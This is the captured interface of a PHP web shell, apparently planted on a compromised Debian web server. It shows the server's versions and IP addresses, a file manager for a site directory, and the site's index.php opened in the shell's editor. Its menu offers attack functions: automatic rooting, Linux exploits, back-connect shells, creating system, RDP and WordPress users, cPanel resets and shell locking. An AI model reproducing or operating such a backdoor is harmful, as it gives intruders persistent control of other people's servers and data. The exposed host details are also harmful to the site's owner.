Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.117.184.236
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
framework
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
protected
[ DIR ]
drwxr-xr-x
static
[ DIR ]
drwxr-xr-x
themes
[ DIR ]
drwxr-xr-x
v2021
[ DIR ]
drwxr-xr-x
.htaccess
150
B
-rw-r--r--
index.php
874
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php ini_set('display_errors', 1); error_reporting( E_ALL & ~E_NOTICE & ~E_WARNING); setlocale(LC_ALL, 'pl_PL'); setlocale(LC_CTYPE, 'pl_PL'); $basePath=dirname(__FILE__); $frameworkPath=$basePath.'/framework/prado.php'; $assetsPath=$basePath.'/assets'; $runtimePath=$basePath.'/protected/runtime'; if(!is_writable($assetsPath)) die("Please make sure that the directory $assetsPath is writable by Web server process."); if(!is_writable($runtimePath)) die("Please make sure that the directory $runtimePath is writable by Web server process."); require_once($frameworkPath); require_once('protected/Common/KApplication.php'); //if ($_SERVER['SERVER_ADDR'] == $_SERVER['REMOTE_ADDR']) if ($_SERVER['SERVER_ADDR'] == '127.0.0.1' && $_SERVER['SERVER_PORT']) define('LOCAL', true); else define('LOCAL', false); $application=new KApplication; $application->run(); ?>
Close